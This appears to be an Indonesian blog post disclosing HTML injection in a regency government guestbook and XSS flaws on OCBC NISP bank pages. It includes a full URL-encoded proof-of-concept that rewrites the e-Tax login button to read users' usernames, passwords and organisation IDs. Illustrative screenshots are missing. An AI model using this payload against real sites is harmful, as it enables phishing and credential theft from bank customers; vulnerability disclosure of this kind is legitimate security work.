1. Website Kabupaten Sidoarjo
TML Injection
Celah pertama yang saya bahas ini pasti sudah sering Anda temui. Target exploitasi celah ini adalah layanan Buku Tamu sidoarjokab.go.id. Saya memasukkan code HTML berupa tag <h1> pada form Buku Tamu:
Hasilnya, input saya tidak disanitasi sehingga identitas dan komentar saya tampil dalam ukuran heading 1:
Saya kemudian mencoba memasukkan code JavaScript pada Buku Tamu:
Dan ternyata, code JavaScript saya dieksekusi:
Bisa Anda bayangkan jika ada orang jahat yang menanam code JavaScript berbahaya yang dapat mencuri informasi sensitif user (cookies, csrf, etc..) di halaman ini. Dari sini kita bisa melihat adanya 2 celah keamanan pada Buku Tamu:
- Tidak ada captha untuk melindungi buku tamu dari SPAMMER;
- Tidak adanya sanitasi input dan output untuk mencegah orang jahat menginjeksikan malicious script;
3. Website OSBC
Tidak bisa dipungkiri lagi dan telah berulang kali terbukti bahwa Website Bank yang memiliki celah XSS sangat rawan untuk menjadi target penipuan. Senin pagi kemarin saya mendapati 2 celah XSS pada portal Bank OCBC NISP, yaitu pada website utama dan pada aplikasi e-Tax OCBC NISP.
XSS Pada OCBCNISP-DOT-COM
POC:
Search Engine:
Pencarian ATM:
Hasil:
XSS Pada Aplikasi e-Tax
POC:
1 | http://etax.ocbcnisp.com/module.asp?module=1&error=%3C/div%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20height=%2269%22%20colspan=%222%22%3E%3Cdiv%20align=%22center%22%3E%3Cinput%20name=%22Login%22%20type=%22button%22%20%20value=%22Login%22%20onClick=%22alert%28%27Info%20dari%20form%20Login%5Cn--------------------------------------------%5CnUsername:%20%27%2Bdocument.getElementsByName%28%27UserID%27%29[0].value%2B%27%5CnPassword:%20%27%2Bdocument.getElementsByName%28%27Password%27%29[0].value%2B%27%5CnOrganisation%20ID:%20%27%2Bdocument.getElementsByName%28%27orid%27%29[0].value%2B%27%5Cn%5CnInfo%20diatas%20telah%20terkirim%20ke%20server%20WWW.SPYROZONE.NET%27%29;%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E%3Cnoscript%3E |
Hasil:
Isikan username, password & ID organisani, kemudian klik tombol [Login].
Melalui XSS, saya mengganti tombol submit form menjadi tombol yang akan mengambil data pada form, lalu menampilkannya di layar.
Phisher bisa mengganti fungsi saya menjadi fungsi untuk mengirimkan data-data tersebut ke servernya untuk menampung username dan password korban.
Oleh Spyro.net